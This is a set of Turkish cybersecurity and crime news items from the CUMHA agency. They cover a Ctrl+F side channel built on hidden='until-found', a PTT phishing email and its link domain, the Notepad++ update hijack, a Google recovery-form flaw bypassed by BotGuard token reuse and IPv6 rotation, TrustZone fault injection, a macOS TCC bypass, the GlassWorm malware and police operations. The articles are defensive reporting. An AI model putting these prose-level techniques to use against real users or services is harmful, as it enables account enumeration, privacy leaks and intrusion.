Ctrl F Yapıldığında DOM Sessiz Kalmıyor
hidden="until-found" ile gizlenen içerikler normal şartlarda görünmez durumda kalıyor. Ancak sayfa içi arama sırasında eşleşme oluştuğunda, tarayıcı bu elementleri geçici olarak görünür hâle getiriyor. Bu aşamada tetiklenen beforematch adlı DOM olayı, JavaScript tarafından dinlenebiliyor ve kullanıcı aramasına dair dolaylı bilgiler üretebiliyor.

Karakter Karakter Çözümlenebilen Arama
Teknik incelemede, sayfaya eklenen binlerce gizli HTML elementinin olası karakter dizilerini temsil ettiği belirtiliyor. Kullanıcı Ctrl+F alanına bir karakter yazdığında, yalnızca eşleşen element için beforematch olayı tetikleniyor. Bu zincirleme yapı sayesinde, klavye dinlemesi yapılmadan kullanıcının arama girdisinin adım adım tahmin edilebildiği ifade ediliyor. Bu yöntem, klasik anlamda bir side‑channel olarak tanımlanıyor.

Parola Sızıntı Siteleri İçin Kritik Senaryo
Uzmanlar, bu tekniğin özellikle “parolanız sızdırıldı mı” iddiasıyla hizmet veren siteler açısından ciddi bir risk barındırdığına dikkat çekiyor. Kullanıcının mevcut parolasını bu tür sitelere yazması hâlinde, sayfa içinde yer alan hidden="until-found" elementleri aracılığıyla parolanın kısmen bile olsa sızdırılabilmesi teorik olarak mümkün görülüyor. Bu durum, kullanıcı parolayı kendi rızasıyla girmiş olsa bile ek bir gizlilik tehdidi oluşturuyor.

Teknik Çalışmanın Kaynağı ve Türkçe Yayın
Söz konusu riskin pratikte nasıl çalıştığı, uluslararası güvenlik araştırmaları kapsamında daha önce ortaya konulan teknik bir yöntem üzerinden gösteriliyor. Bu çalışmayı derleyerek Türkçeleştiren ve kamuoyuna haberleştiren isim ise siber güvenlik araştırmacısı Ebubekir Bastama oldu. Bastama’nın internet sitesinde yayımlanan içerikte, hidden="until-found" ve beforematch kombinasyonunun Ctrl+F girdilerini nasıl dolaylı biçimde açığa çıkarabildiği ayrıntılı şekilde aktarılıyor.

Test Edilebilen PoC Adresi
Yayımlanan çalışmada, yöntemin teorik anlatımla sınırlı kalmadığına dikkat çekiliyor. Kullanıcılar ve geliştiriciler, ilgili davranışı doğrudan test edebilmek için hazırlanan PoC’ye şu adres üzerinden erişebiliyor: https://ebubekirbastama.com.tr/ctrl-f-until-found-side-channel-poc.html

Boşluklar Bile Atlanmıyor
Analizde, Ctrl+F indekslemesinde boşluk karakterlerinin tek başına algılanmaması nedeniyle Zero‑Width Space (\u200B) gibi görünmez karakterlerin kullanıldığı aktarılıyor. Bu sayede, boşluk içeren kelime ve parola dizilerinin de tarayıcı tarafından indekslenebildiği belirtiliyor.

Hızlı Yazımda Özellikle PC’lerde Çalışmıyor
Çalışmada özellikle masaüstü bilgisayarlara vurgu yapılıyor. Ctrl+F alanına karakterlerin çok hızlı yazılması veya metnin yapıştırılması durumunda, tarayıcıların performans optimizasyonları nedeniyle bazı DOM taramalarını atladığı belirtiliyor. Bu senaryolarda beforematch olayının tetiklenmediği ve algılamanın çalışmadığı ifade ediliyor. Uzmanlar, bunun JavaScript kaynaklı bir hata değil, bilinçli bir tarayıcı davranışı olduğunun altını çiziyor.

Tarayıcı Güvenliği Yeniden Gündemde
Uzman görüşlerinde, beforematch olayının JavaScript erişimine kapatılması, hidden="until-found" elementlerinin gözlemlenemez hâle getirilmesi ya da Ctrl+F indekslemesinin DOM olayı üretmeden çalışması gibi önlemlerin değerlendirilmesi gerektiği belirtiliyor. Kullanıcı deneyimi için eklenen her yeni tarayıcı özelliğinin, gizlilik ve veri güvenliği açısından yeniden ele alınması gerektiği vurgulanıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sivil bir inisiyatifle hazırlanan ve Aile ve Sosyal Hizmetler Bakanı Mahinur Özdemir Göktaş’ın öncülüğünde kamuoyuna sunulan sözleşme, Cumhurbaşkanı Recep Tayyip Erdoğan’ın imzası ve uluslararası destek çağrısıyla dijital ortamda çocuk haklarının korunmasına yönelik güçlü bir farkındalık zemini oluşturdu.

Cumhurbaşkanı Erdoğan’ın çağrısının ardından Bakanlık, internet, sosyal medya ve yapay zekâ tabanlı sistemlerin çocukların yaşamına doğrudan etki ettiği günümüzde, koruma politikalarının güncellenmesi ve sınır aşan risklere karşı ortak hareket edilmesi hedefiyle çalışmalarını yoğunlaştırdı.

81 İlde Eş Zamanlı Farkındalık Çalışmaları
Aile ve Sosyal Hizmetler Bakanlığı il müdürlükleri aracılığıyla 81 ilde bilgilendirme ve farkındalık artırıcı faaliyetler başlatıldı. İl Çocuk Hakları Komiteleri öncülüğünde yürütülen çalışmalarda, çocuk haklarına ilişkin toplumsal duyarlılığın güçlendirilmesi ve sözleşmenin toplumun tüm kesimlerince benimsenmesi amaçlandı.

Bu süreçte sivil toplum kuruluşları, yerel yönetimler, eğitim kurumları ve ilgili paydaşlarla iş birliği yapılarak afiş ve broşür dağıtımları, sosyal medya paylaşımları, panel ve seminerler düzenlendi. Meydanlar, ulaşım noktaları, alışveriş merkezleri ve festival alanlarında kurulan stantlarla da geniş kitlelere ulaşıldı.

Bakanlık verilerine göre, 19 Aralık 2025’te başlatılan kampanya kapsamında yürütülen çalışmalar sonucunda “Dijital Dünyada Çocuk Hakları Sözleşmesi” 309 bin 754 kişi tarafından imzalandı.

2026–2030 Eylem Planı Yürürlükte
Öte yandan Aile ve Sosyal Hizmetler Bakanlığı tarafından hazırlanan 2026–2030 Dijital Dünyada Çocukların Güçlendirilmesine Yönelik Eylem Planı, Cumhurbaşkanı Recep Tayyip Erdoğan’ın imzasıyla Resmî Gazete’de yayımlanarak yürürlüğe girdi. Eylem planıyla, çocukların çevrim içi ortamlarda güvenli şekilde var olmaları ve dijital mecralarda karşılaşabilecekleri risklere karşı korunmaları hedefleniyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Şüpheli Link Detayı Ortaya Çıktı
Sahte e-postada yer alan “Ödemeyi Tamamla” butonuna tıklayan kullanıcıların, i6ome8hbb.cc.rs6.net uzantılı, PTT ile hiçbir bağlantısı bulunmayan bir adrese yönlendirildiği tespit edildi. Bağlantının, Constant Contact altyapısı üzerinden gizlenmiş şekilde sunulduğu ve kullanıcıyı sahte ödeme sayfasına yönlendirmeyi amaçladığı ifade ediliyor.

Yurt Dışı Kaynaklı Adresler Alarm Veriyor
E-postanın gönderici adresinde “info-santedicola.com@shared1.ccsend.com” ibaresinin yer aldığı, mesajın alt bölümünde ise ABD’ye ait açık adres bilgilerinin bulunduğu görüldü. Siber güvenlik uzmanları, bu tür yurt dışı kaynaklı ve kurumsal görünümlü adreslerin, oltalama saldırılarında sıkça kullanıldığını vurguluyor.

Amaç Kredi Kartı ve Kişisel Veriler
Uzmanlara göre sahte bağlantı üzerinden açılan sayfalarda kredi kartı bilgileri, kimlik verileri ve banka bilgileri hedef alınıyor. Girilen bilgilerin anlık olarak dolandırıcıların eline geçtiği ve kartlardan izinsiz harcamalar yapıldığı bildiriliyor.

PTT’nin Uygulamalarıyla Örtüşmüyor
PTT’nin resmî uygulamalarında gümrük vergisi bildirimlerinin e-posta yoluyla ve üçüncü taraf bağlantılar üzerinden yapılmadığı belirtiliyor. Kurumun, ödemelerin yalnızca resmî internet sitesi, e-Devlet ve PTT şubeleri aracılığıyla gerçekleştirildiğini daha önce kamuoyuna duyurduğu hatırlatılıyor.

Yetkililerden Vatandaşa Uyarı
Siber güvenlik uzmanları, bu tür e-postaların kesinlikle açılmaması, bağlantılara tıklanmaması ve ödeme bilgisi girilmemesi gerektiğini vurguluyor. Şüpheli mesajların BTK ve ilgili resmi platformlara bildirilmesi çağrısı yapılıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Güncelleme Trafiği Saldırganların Kontrolüne Geçti
Paylaşılan bilgilere göre, Haziran 2025 ile 2 Aralık 2025 tarihleri arasında Notepad++’ın güncelleme mekanizması olan WinGUp üzerinden gerçekleşen trafik, saldırganlar tarafından kontrol edilen sunuculara yönlendirildi. Bu süreçte, kullanıcılara resmi güncelleme izlenimi veren zararlı yazılım içeren sahte paketler gönderildiği belirtildi.

“Hedefli ve Seçici Bir Operasyon”
Onur Oktay, saldırının geniş kitleleri kapsayan rastgele bir girişim olmadığını vurgulayarak, “Bu operasyon herkese açık bir saldırı değildi. Belirli IP blokları veya coğrafi bölgelerdeki kullanıcılar hedef alındı.” ifadelerini kullandı. Elde edilen bulguların, saldırının Çin devlet destekli bir APT grubu tarafından yürütüldüğüne işaret ettiği aktarıldı.

Zafiyet Kaynak Kodda Değil Güncelleyicide
Oktay’ın değerlendirmesine göre, Notepad++’ın kaynak kodunda herhangi bir güvenlik açığı tespit edilmedi. Ancak WinGUp aracının, indirilen dosyaların dijital imza ve sertifika doğrulamasını yeterince sıkı yapmaması, saldırının başarıya ulaşmasına neden oldu. Hosting seviyesinde gerçekleştirilen Man-in-the-Middle yönlendirmesiyle sahte güncellemeler meşru kabul edildi.

Alınan Önlemler ve Yeni Sürüm
Olayın ardından Notepad++ tarafında hosting sağlayıcısı değiştirildi, tüm erişim bilgileri sıfırlandı ve v8.8.9 sürümü yayımlandı. Bu sürümle birlikte güncelleyicinin, indirilen paketlerin imza ve sertifikalarını zorunlu olarak kontrol ettiği, doğrulama başarısız olursa güncellemenin iptal edildiği kaydedildi.

Kullanıcılara Güvenlik Uyarısı
Saldırının hedefe özel zararlı yazılımlar içermesi nedeniyle tek bir dosya imzası bulunmadığına dikkat çekildi. Şüpheli ağ trafiği ve %TEMP% klasöründe Notepad++ imzası taşımayan çalıştırılabilir dosyalar, olası bulaş göstergeleri arasında yer aldı. Onur Oktay, v8.8.9 öncesi sürümleri kullananların uygulama içinden güncelleme yapmaması ve ilgili dönemde güncelleme alan sistemlerin EDR veya antivirüs çözümleriyle taranması gerektiğini belirtti.

Yeni Güvenlik Katmanları Geliyor
Geliştirici ekip tarafından, ilerleyen sürümlerde XML dijital imzalama (XMLDSig) desteğinin devreye alınacağı duyuruldu. Olayın, yazılım güvenliği kadar altyapı güvenliğinin de kritik önemde olduğunu bir kez daha ortaya koyduğu ifade edildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Araştırmacı, JavaScript kapalıyken dahi çalışan bu formun, belirli HTTP istekleri aracılığıyla bir telefon numarasının belirli bir ad-soyad ile eşleşip eşleşmediğini doğruladığını tespit etti. Bu mekanizma sayesinde, doğru parametreler kullanıldığında bir Google hesabının varlığı ve ilişkili telefon numarası hakkında doğrulama yapılabildi.

İki Aşamalı Doğrulama Mekanizması
İlk aşamada, hesap kurtarma formuna girilen telefon numarasıyla bir oturum anahtarı üretildi. İkinci aşamada ise bu anahtar kullanılarak ad ve soyad bilgileriyle doğrulama yapıldı. Sistem, eşleşme durumunda kullanıcıyı farklı bir kurtarma sayfasına yönlendirerek hesabın varlığını dolaylı olarak doğruladı.

Başlangıçta IP bazlı hız sınırlaması ve captcha engeliyle karşılaşan araştırmacı, BotGuard doğrulama token’ının, JavaScript’li formdan alınıp JavaScript’siz forma entegre edilmesiyle bu engellerin aşıldığını belirtti. Bu yöntemle, veri merkezi IP’leri üzerinden dahi yüksek hacimli sorguların mümkün hale geldiği ifade edildi.

IPv6 ve Büyük Ölçekli Denemeler
Araştırmada, IPv6 adres alanlarının sunduğu genişlikten faydalanılarak her istek için farklı bir IP kullanıldığı, bu sayede hız sınırlamalarının etkisiz hale getirildiği kaydedildi. Araştırmacı, geliştirdiği araçla saniyede on binlerce deneme yapılabildiğini aktardı.

Ülke Kodu ve İsim Bilgileri de Tespit Edilebildi
Telefon numarasının ülke kodu, Google’ın “şifremi unuttum” akışında gösterdiği maskeli numara formatları üzerinden belirlenebildi. Araştırmacı, bu formatların Google’ın kullandığı açık kaynaklı libphonenumber kütüphanesiyle birebir örtüştüğünü belirtti.

Kullanıcının ad ve soyad bilgisine ise Google Looker Studio üzerinden ulaşıldı. Araştırmacı, oluşturulan bir belgenin hedef kullanıcıya devredilmesiyle, kullanıcının hiçbir etkileşimi olmadan adının ana sayfada görüntülendiğini kaydetti.

“İstismar Olasılığı Düşük Denildi, Ödül Artırıldı”
Açık, 14 Nisan 2025’te Google’a bildirildi. Google, ilk değerlendirmede istismar olasılığını düşük bularak sınırlı bir ödül verdi. Araştırmacının itirazı sonrası yapılan yeniden değerlendirmede ise etkinin yüksek olduğu kabul edilerek ödül toplam 5 bin dolar seviyesine çıkarıldı.

Google, 22 Mayıs 2025 itibarıyla geçici önlemlerin devreye alındığını, 6 Haziran 2025’te ise JavaScript’siz kullanıcı adı kurtarma formunun tamamen devre dışı bırakıldığını doğruladı. Açık, 9 Haziran 2025’te kamuoyuna açıklandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Tutuklama ve Adli Kontrol Kararları
Yerlikaya, 19 il merkezli olarak yürütülen “Nitelikli Dolandırıcılık, Çevrim İçi Çocuk Müstehcenliği ve Tacizi, Yasa Dışı Bahis” suçlarına yönelik operasyonlarda yakalanan şüphelilerden 65’inin tutuklandığını, 48’i hakkında adli kontrol hükümleri uygulandığını, diğer şüphelilerle ilgili işlemlerin ise sürdüğünü açıkladı.

Suç Yöntemleri ve Tespitler
Şüphelilerin; sosyal medya platformları ve oltalama siteleri üzerinden “görev yap kazanç sağla” ve “ürün satışı” temalarıyla dolandırıcılık yaptıkları, vatandaşların mobil bankacılık ve oyun hesaplarına yetkisiz erişim sağladıkları tespit edildi. Ayrıca yasa dışı bahis ve kumar oynattıkları, bahis sitelerinde para nakline aracılık ettikleri, reklam faaliyetlerinde bulundukları belirlendi.

Açıklamada, şüphelilerin müstehcen çocuk görüntüsü barındırdığı, POS tefeciliği yaptığı ve kişisel verilerin paylaşımı ile sorgulanmasına yönelik içerikler ürettiği de kaydedildi.

19 İlde Eş Zamanlı Operasyon
EGM Siber Suçlarla Mücadele Daire Başkanlığı ve MASAK koordinasyonunda yürütülen çalışmalar kapsamında; Adana, Adıyaman, Aydın, Bolu, Çanakkale, Denizli, Düzce, Gaziantep, Giresun, Gümüşhane, İstanbul, İzmir, Kayseri, Kırşehir, Kocaeli, Mardin, Sakarya, Samsun ve Van illerinde operasyonlar düzenlendi. Yakalanan şüpheliler hakkında savcılıklarca soruşturma başlatıldı.

“Hiçbir Yapıya Müsamaha Yok”
Ali Yerlikaya, “Siber suçlara karşı yürüttüğümüz kararlı mücadeleyle, dijital alanda vatandaşlarımızın güvenliğini tehdit eden hiçbir yapıya müsamaha göstermiyoruz.” ifadelerini kullandı ve operasyonlarda görev alan ekipleri tebrik etti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Araştırma, üç bölüm halinde yayımlandı. İlk bölümde çipin EMFI saldırılarına karşı karakterizasyonu, ikinci bölümde Secure Monitor içinde rastgele okuma ve yazma elde edilmesi, üçüncü bölümde ise EL3 seviyesinde kalıcı kod yürütme ayrıntıları paylaşıldı. Araştırmacılar, “Amaç, donanım tabanlı güvenlik mekanizmalarının gerçek dünyada ne kadar dayanıklı olduğunu ölçmekti.” ifadelerini kullandı.

Elektromanyetik Hata Enjeksiyonu Nasıl Çalışıyor
EMFI yöntemi, işlemci üzerine çok kısa süreli ve yüksek enerjili elektromanyetik darbeler uygulanmasına dayanıyor. Bu darbeler sayesinde işlemcinin yürüttüğü talimatların bozulabildiği belirtiliyor. Araştırmacılar, “Bir kontrol talimatı atlanabiliyor ya da beklenen işlem yerine farklı bir komut yürütülebiliyor.” değerlendirmesinde bulundu.

Secure Monitor Kontrolleri Atlatıldı
Çalışmanın ikinci aşamasında, Secure Monitor tarafından uygulanan adres doğrulama mekanizmalarının hedef alındığı aktarıldı. Normal şartlarda yalnızca izin verilen bellek alanlarına erişim sağlayan is_allowed_address benzeri kontrollerin, doğru zamanlamayla yapılan EMFI saldırıları sonucunda devre dışı bırakılabildiği kaydedildi. Bu sayede, EL3 bağlamında rastgele 32 bit okuma ve yazma yapılabildiği vurgulandı.

XPU Yapılandırması Değiştirildi
Araştırmanın en kritik aşamasında, TrustZone adres alanlarını koruyan XPU yapılandırmasının yeniden programlanabildiği belirtildi. Araştırmacılar, “Tek bir başarılı glitch, Secure Monitor içinde keyfi uzunlukta kod yürütmek için yeterli.” ifadesini kullandı. Bu durumun, cihazın en korumalı yazılım katmanının tamamen kontrol altına alınması anlamına geldiği aktarıldı.

Saldırı Zor Ama Mümkün
Araştırmacılar, saldırının pratikte yüksek beceri, hassas ekipman ve uzun deneme süreleri gerektirdiğini belirtti. Ortalama başarı süresinin 30 ila 40 dakika arasında değiştiği, çok sayıda yeniden başlatma ve zamanlama denemesi gerektiği kaydedildi. Buna rağmen, elde edilen sonucun teorik değil, pratik olarak uygulanabilir olduğu vurgulandı.

Donanım Güvenliği Tartışması
Çalışma, gömülü ağ cihazlarında yalnızca yazılımsal önlemlerin yeterli olmayabileceğini ortaya koydu. Araştırmacılar, “TrustZone ve Secure Monitor gibi donanım destekli güvenlik katmanları bile fiziksel saldırılar karşısında aşılabilir.” değerlendirmesinde bulundu. Fiziksel erişim sağlanan cihazlarda, en yüksek ayrıcalık seviyesinin dahi ele geçirilebileceği uyarısı yapıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

“Olumsuz İçeriklere Karşı Ücretsiz Koruma Sağlanıyor”
Bakan Uraloğlu, Güvenli İnternet Hizmeti sayesinde abonelerin; uyuşturucu ticareti, şiddet, ırkçılık, nefret söylemi, terör propagandası, suç unsurları ve dolandırıcılık içeren sitelere karşı talebe bağlı ve ücretsiz olarak korunduğunu ifade etti. Hizmet kapsamında Çocuk ve Aile olmak üzere iki ayrı profil sunulduğunu belirtti.

Çocuk ve Aile Profilleri Nasıl Çalışıyor
Abdulkadir Uraloğlu, Çocuk Profili’nin yalnızca güvenli olduğu onaylanmış sitelere erişim sağlayan izinli liste sistemiyle çalıştığını, Aile Profili’nin ise zararlı içerik barındıran sitelere erişimi engelleyen yasaklı liste yöntemini kullandığını kaydetti. Uraloğlu, kullanıcıların karşılaştıkları olumsuzlukları bildirme ve tedbir talep etme hakkına sahip olduğunu vurguladı.

“Güvenli İnternet Merkezi Bilinçli Kullanımı Destekliyor”
2016 yılında kurulan Güvenli İnternet Merkezi’nin BTK bünyesinde faaliyet gösterdiğini hatırlatan Uraloğlu, merkezin Bilinçlendirme, İnternet Yardım ve İhbar Merkezleri aracılığıyla çocuklar ve ebeveynlere yönelik çalışmalar yürüttüğünü söyledi. Uraloğlu, “www.guvenliweb.org.tr üzerinden sağlanan içeriklerle toplumun geniş kesimlerine ulaşmaya devam ediyoruz.” dedi.

1781 Eğitimle 300 Binden Fazla Kişiye Ulaşıldı
Bakan Uraloğlu, Güvenli İnternet Merkezi’nin kuruluşundan bu yana 1781 eğitim düzenlediğini ve 300 binden fazla kişiye ulaştığını belirtti. Yalnızca bu yıl içinde gerçekleştirilen 138 eğitimle yaklaşık 22 bin kişinin bilgilendirildiğini kaydeden Uraloğlu, eğitimlerin çocuklar ve gençler için farkındalık oluşturduğunu ifade etti.

Güvenli İnternet Tırı 85 Bin Öğrenciye Ulaştı
Güvenli İnternet Tırı projesine de değinen Uraloğlu, bugüne kadar 200’den fazla okulun ziyaret edildiğini ve 85 bin öğrenciye ulaşıldığını açıkladı. Uraloğlu, çocukların teknolojiyi doğru ve bilinçli kullanmaları için benzer projelerin yaygınlaştırılacağını bildirdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

VoiceOver Çerçevesi Üzerinden İstismar
Güvenlik araştırmacıları, açığın VoiceOver framework’ü ve com.apple.scrod adlı sistem servisi üzerinden tetiklendiğini belirtti. Bu yöntemle saldırganların, Apple tarafından imzalanmış süreçlere kod enjekte edebildiği ve bu süreçler aracılığıyla AppleScript çalıştırabildiği ifade edildi.

TOCTOU Yarış Koşulu ile Tam TCC Aşımı
İstismarın temelinde, Time-of-Check-Time-of-Use (TOCTOU) türü bir yarış koşulunun yer aldığı kaydedildi. Kod enjeksiyonu ile bu yarış koşulunun birlikte kullanılması sonucunda, saldırganların Finder ile etkileşime girebildiği, dosya okuyabildiği, mikrofona erişebildiği ve keyfi AppleScript komutları çalıştırabildiği aktarıldı. Tüm bu işlemlerin kullanıcıya herhangi bir bildirim gönderilmeden gerçekleştiği vurgulandı.

Apple: Açık macOS 26.2 ile Kapatıldı
Apple, güvenlik açığının macOS 26.2 sürümünde giderildiğini duyurdu. Şirket, com.apple.private.accessibility.scrod yetkisinin artık process audit token üzerinden doğrulandığını ve bu sayede hem kod enjeksiyonu açığının hem de TOCTOU penceresinin ortadan kaldırıldığını açıkladı.

Kullanıcılara Güncelleme Çağrısı
Apple, kullanıcıların sistemlerini en kısa sürede güncellemelerini önerdi. Güncellemenin, macOS → System Settings → Software Update adımları izlenerek yapılabileceği hatırlatıldı. Güvenlik uzmanları, açığın kapsamı nedeniyle güncellemenin geciktirilmemesi gerektiğini belirtti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Tutuklama ve Adli Kontrol Kararları
Bakan Yerlikaya’nın açıklamasına göre, yakalanan şüphelilerden 131’i tutuklandı, 66’sı hakkında adli kontrol hükümleri uygulandı, diğer şüphelilerin işlemlerinin ise devam ettiği bildirildi.

Dolandırıcılık ve Yasa Dışı Faaliyetler Tespit Edildi
Şüphelilerin, sosyal medya platformları ve oltalama siteleri üzerinden ürün satışı, hesap kiralama, ev ve araç satış ve kiralama temalarıyla dolandırıcılık yaptıkları, vatandaşların mobil bankacılık ve oyun hesaplarına yetkisiz erişim sağladıkları belirlendi. Ayrıca, yasa dışı bahis ve kumar oynattıkları, yasa dışı bahis sitelerinde para nakline aracılık ettikleri ve reklam yaptıkları tespit edildi.

Çocuk Müstehcenliği ve Kişisel Veri İhlalleri
Operasyonlar kapsamında bazı şüphelilerin müstehcen çocuk görüntüleri barındırdığı, kişisel verilerin paylaşımı ve sorgulanması konularında yasa dışı faaliyetlerde bulunduğu da açıklandı.

37 İlde Eş Zamanlı Operasyon
EGM Siber Suçlarla Mücadele Daire Başkanlığı ve MASAK koordinasyonunda, İl Emniyet Müdürlüklerine bağlı Siber Suçlarla Mücadele Şube Müdürlüklerince yürütülen çalışmalar kapsamında; Adana’dan Zonguldak’a kadar 37 ilde eş zamanlı operasyonlar düzenlendi. Yakalanan şüpheliler hakkında savcılıklar tarafından soruşturma başlatıldı.

“Şüpheli Durumlarda 112’yi Arayın”
Bakan Yerlikaya, vatandaşlara çağrıda bulunarak, siber suç ve suçlularla ilgili şüpheli durumlarda 112 Acil Çağrı Merkezi’nin aranmasını istedi. Yerlikaya, operasyonlarda görev alan tüm birimleri tebrik etti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

16 İlde Eş Zamanlı Operasyon
Yasa dışı bahis, nitelikli dolandırıcılık, çevrim içi çocuk müstehcenliği ve tacizi suçlarına yönelik yürütülen operasyonların Adıyaman, Afyonkarahisar, Antalya, Çanakkale, Diyarbakır, Gaziantep, Giresun, İstanbul, İzmir, Kırıkkale, Kocaeli, Konya, Mersin, Ordu, Samsun ve Siirt illerinde gerçekleştirildiği açıklandı.

Adli Süreç Başlatıldı
Ali Yerlikaya, yakalanan şüphelilerden 16’sının tutuklandığını, 41’i hakkında adli kontrol hükümleri uygulandığını, diğer şüphelilerle ilgili işlemlerin ise sürdüğünü kaydetti. Şüpheliler hakkında savcılıklar tarafından soruşturma başlatıldı.

Suçlamalar Netleşti
Operasyonlar kapsamında yakalanan şüphelilerin; yasa dışı bahis ve kumar oynattıkları, bahis sitelerinde para nakline aracılık ettikleri ve reklam yaptıkları, müstehcen çocuk görüntüleri barındırdıkları, sosyal medya ve oltalama siteleri üzerinden ürün satışı ve kripto yatırım temalarıyla dolandırıcılık yaptıkları tespit edildi. Ayrıca şüphelilerin, kişisel verilerin paylaşımı, mobil bankacılık ve oyun hesaplarına yetkisiz erişim sağlama gibi suçlara karıştıkları belirlendi.

“Şüpheli Durumlarda 112’yi Arayın”
Yerlikaya açıklamasında, “Şüphelendiğiniz bir durumda hemen 112 Acil Çağrı Merkezi’ni arayın. Biz gereğini yapalım.” ifadelerini kullandı. Operasyonların, EGM Siber Suçlarla Mücadele Daire Başkanlığı ve MASAK koordinesinde, İl Emniyet Müdürlükleri Siber Suçlarla Mücadele Şube Müdürlüklerince yürütüldüğü bildirildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

685 Milyon Liralık İşlem Hacmi Tespit Edildi
Ali Yerlikaya, şüphelilerin 2020-2025 yılları arasında hesaplarında toplam 685 milyon liralık işlem hacmi bulunduğunun tespit edildiğini açıkladı. Yakalanan şüphelilerden 39’unun tutuklandığını, 46’sı hakkında adli kontrol hükümleri uygulandığını, diğer şüphelilerle ilgili işlemlerin ise sürdüğünü kaydetti.

14 İlde Eş Zamanlı Operasyon
Operasyonların; İstanbul, Ankara, Yalova, Kütahya, Diyarbakır, Zonguldak, Edirne, Muğla, Siirt, Ordu, Mersin, Ağrı, Aksaray ve Hatay illerinde gerçekleştirildiği bildirildi. Çalışmaların, Cumhuriyet Başsavcılıkları, Jandarma Genel Komutanlığı Siber Suçlarla Mücadele Daire Başkanlığı ve MASAK koordinesinde İl Jandarma Komutanlıkları tarafından yürütüldüğü belirtildi.

Çok Sayıda Dolandırıcılık Yöntemi Kullanıldı
Yerlikaya, şüphelilerin vatandaşlara ait kişisel bilgileri yasa dışı yollarla ele geçirerek kullandıklarını ifade etti. Şüphelilerin, sosyal medya üzerinden “yatırım danışmanlığı, sınavsız ehliyet, akülü araba, mobilya, araç yedek parçası, elektronik eşya satışı ve bungalov kiralama” gibi sahte ilanlarla dolandırıcılık yaptığı, yasa dışı bahis oynattığı, suçtan elde edilen paranın nakline aracılık ettiği ve banka hesaplarından bilgileri dışında para çekerek haksız kazanç sağladığı tespit edildi.

Soruşturma Başlatıldı
İçişleri Bakanı Ali Yerlikaya, şüpheliler hakkında savcılıklarca soruşturma başlatıldığını belirterek, “Bu kişiler aracılığıyla işlenebilecek siber dolandırıcılık suçlarıyla vatandaşlarımızın maddi ve manevi zarar görmesini engelledik.” ifadesini kullandı. Yerlikaya, operasyonlarda görev alan tüm birimleri tebrik etti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

GlassWorm ilk kez ekim ayında ortaya çıktı. Zararlı yazılım, görünmez Unicode karakterler kullanılarak gizlenen eklentiler aracılığıyla GitHub, npm ve OpenVSX hesap bilgilerini, ayrıca tarayıcı tabanlı kripto cüzdan verilerini ele geçirmeyi hedefledi. Önceki dalgalarda Windows sistemler odak alınırken, son kampanyada yalnızca macOS kullanıcılarının hedef seçildiği bildirildi.

Yeni Saldırı Yöntemi ve Teknik Detaylar
Araştırmacılara göre son dalgada, önceki sürümlerde kullanılan Unicode gizleme veya Rust tabanlı ikililer yerine, AES-256-CBC ile şifrelenmiş bir yük derlenmiş JavaScript kodu içine gömülüyor. Zararlı eklentilerin, kurulumu takip eden 15 dakikalık gecikmeyle çalıştığı ve bu yöntemin analiz ortamlarından kaçınmayı amaçladığı ifade edildi.

GlassWorm’un yeni sürümü, PowerShell yerine AppleScript kullanıyor ve kalıcılık için Windows Kayıt Defteri yerine LaunchAgents mekanizmasından yararlanıyor. Komuta-kontrol altyapısında ise önceki kampanyalarda da kullanılan Solana blokzinciri tabanlı yapı korunuyor.

Trojenli Donanım Cüzdanları ve Keychain Hedefi
Zararlı yazılımın, 50’den fazla tarayıcı kripto eklentisini, geliştirici hesap bilgilerini ve tarayıcı verilerini hedef almasının yanı sıra artık macOS Keychain parolalarına erişmeye çalıştığı kaydedildi. Ayrıca sistemde Ledger Live ve Trezor Suite gibi donanım cüzdan uygulamalarını tespit ederek, bunları trojenli sürümlerle değiştirmeyi amaçlayan yeni bir yetenek eklendi.

Koi Security, bu mekanizmanın şu an için başarısız olduğunu ve trojenli cüzdan dosyalarının boş döndüğünü belirtti. Kurum, “Bu durum saldırganların macOS cüzdan trojenlerini henüz hazırlamakta olduğunu ya da altyapının geçiş aşamasında bulunduğunu gösteriyor. Ancak tüm diğer zararlı işlevler aktif durumda.” açıklamasını yaptı.

Binlerce İndirme, Artan Risk
OpenVSX üzerinde yayımlanan ve zararlı olduğu tespit edilen eklentilerden bazılarının 33 bini aşkın indirme sayısına ulaştığı görüldü. Uzmanlar, bu tür rakamların güvenilirlik algısı oluşturmak için manipüle edilebildiğine dikkat çekti.

Güvenlik uzmanları, ilgili eklentileri yükleyen geliştiricilerin derhal kaldırma, GitHub parolalarını sıfırlama, npm erişim anahtarlarını iptal etme, sistemlerini detaylı şekilde kontrol etme ve gerekirse işletim sistemini yeniden kurma çağrısında bulundu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Güvenlik araştırmacılarının paylaştığı bilgilere göre zafiyet, VoiceOver framework’ü üzerinden çalışan com.apple.scrod sistem servisini hedef alıyor. Bu yapı istismar edilerek Apple tarafından imzalanmış süreçler içinde kod çalıştırılabildiği, bunun için yönetici yetkisine gerek duyulmadığı kaydedildi.

Kod Enjeksiyonu ve TOCTOU Birlikteliği
Açığın istismar sürecinde iki kritik unsurun bir araya geldiği aktarıldı. Bunların, Apple imzalı süreçlere yönelik kod enjeksiyonu ve bir Time-of-Check-Time-of-Use (TOCTOU) yarış durumu olduğu ifade edildi. Bu kombinasyonun, TCC korumasını tamamen etkisiz hale getirdiği vurgulandı.

Bu yöntemle saldırganların; belgelere erişebildiği, mikrofonu kullanabildiği, Finder ile etkileşime girebildiği ve AppleScript komutlarını çalıştırabildiği, tüm bunların ise kullanıcıya herhangi bir bildirim gösterilmeden gerçekleştirilebildiği aktarıldı.

Apple’dan Güvenlik Güncellemesi
